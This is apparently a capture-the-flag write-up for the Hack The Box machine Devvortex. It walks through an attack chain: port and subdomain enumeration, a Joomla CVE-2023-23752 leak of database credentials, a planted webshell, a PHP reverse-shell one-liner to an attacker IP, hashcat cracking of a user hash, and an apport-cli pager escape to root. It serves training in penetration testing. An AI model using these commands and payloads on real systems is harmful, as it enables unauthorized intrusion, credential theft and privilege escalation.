Devvortex

Enumeration

nmap -A -p- -sC -sV -Pn -v devvortex.htb
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: DevVortex
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/5%OT=22%CT=1%CU=38991%PV=Y%DS=2%DC=T%G=Y%TM=65C16
OS:2D7%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST
OS:11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Uptime guess: 34.562 days (since Tue Jan  2 04:06:17 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 554/tcp)
HOP RTT      ADDRESS
1   45.82 ms 10.10.14.1
2   45.89 ms devvortex.htb (10.10.11.242)

NSE: Script Post-scanning.
Initiating NSE at 17:36
Completed NSE at 17:36, 0.00s elapsed
Initiating NSE at 17:36
Completed NSE at 17:36, 0.00s elapsed
Initiating NSE at 17:36
Completed NSE at 17:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.77 seconds
           Raw packets sent: 66004 (2.908MB) | Rcvd: 65653 (2.635MB)

Port 80

Enumerating any hidden directories or files seems to not reveal any important hint:

gobuster dir -u http://devvortex.htb/ -w /usr/share/wordlists/dirb/common.txt

Also enumerating based on extensions of backend technology:

ffuf -u http://devvortex.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt -ic -t 400 -e .php,.html,.txt 

Further we did DNS enumeration for the devvortex.htb website using Host Header enumeration, which showed us the existance of a new domain dev.devvortex.htb:

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt  -u http://devvortex.htb/ -H "Host: FUZZ.devvortex.htb" -mc 200

Add the vhost dev.devvortex.htb to /etc/hosts and enumerate it:

Try to enumerate some hidden directories:

gobuster dir -u http://dev.devvortex.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

/robots.txt:

/administrator:

We can enumerate the version of Joomla simply visiting this file:

/administrator/manifests/files/joomla.xml

/api:

Info

  • nginx/1.18.0 (Ubuntu)

  • vhost dev.devvortex.htb

    • Joomla 4.2.6

    • /api enabled

Exploitation

Finding if this version of Joomla is vulnerable, we can try this exploit:

This Ruby script nicely formats information that can also be found via cURL or browser as shown above.

The CVE-2023-23752 Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.

We need to install Ruby dependecies:

Download Gemfile, install dependencies using bundle install and run exploit:

Info

  • Database info

    • username: lewis

    • password: P4ntherg0t1n5r3c0n##

    • db name: joomla

    • db type: mysql

    • db prefix: sd4fg_

Enumeration 2

Access /administrator section of Joomla using lewis credentials:

Add a new file cmd.php with your preferred webshell:

List OS users:

cat /etc/passwd

We need to spawn a reverse shell in order to have a semi-TTY and interact with MySQL database:

php -r '$sock=fsockopen("10.10.15.101",9000);exec("sh <&3 >&3 2>&3");'
python3 -c 'import pty;pty.spawn("/bin/bash")';

Enumerate on MySQL:

mysql -u lewis -p

List tables:

use joomla;
SHOW TABLES;

List all users:

SELECT * FROM sd4fg_users;
logan paul | logan | [email protected] | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

Try to crack this password with hashcat.

Identify the mode:

hashcat --identify logan.hash

Crack it:

hashcat -m 3200 logan.hash /usr/share/wordlists/rockyou.txt

Privilege Escalation (logan)

Login in SSH using logan:tequieromucho credential

Verify what commands logan can run using sudo:

apport-cli is a command-line tool in Ubuntu (and its derivatives) that allows users to interact with the Apport crash reporting system. Apport is a system that automatically collects data about crashes, errors, and other malfunctions on the system, and then presents them in a user-friendly format for reporting to developers and Ubuntu maintainers.

Here's a brief overview of apport-cli:

  1. Reporting Crashes: apport-cli allows users to manually report crashes and errors to the Ubuntu developers. This can be useful for providing detailed information about the issue encountered, which can help developers diagnose and fix the problem.

  2. Collecting Data: When a crash occurs, apport collects various data such as log files, stack traces, and other diagnostic information related to the crash. This data is then presented to the user for review and optionally for reporting.

  3. Non-Interactive Mode: apport-cli can also be used in non-interactive mode, where it collects crash information and sends it to the Ubuntu error tracker without user intervention. This can be useful for automated error reporting or debugging tasks.

  4. Usage: The basic usage of apport-cli involves specifying the package name or process ID (PID) of the crashed application, along with any additional options for collecting debug information.

A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege. It is extremely unlikely that a system administrator would configure sudo to allow unprivileged users to perform this class of exploit.

To generate a .crash report, run a simple command like this one:

sleep 60 &

Note the PID:

Send SIGSEGV signal:

kill -SIGSEGV 18640

To spawn a root shell, wait that the pager less provide to you the command prompt ':' and then type /bin/bash

Now we're finally root:

Last updated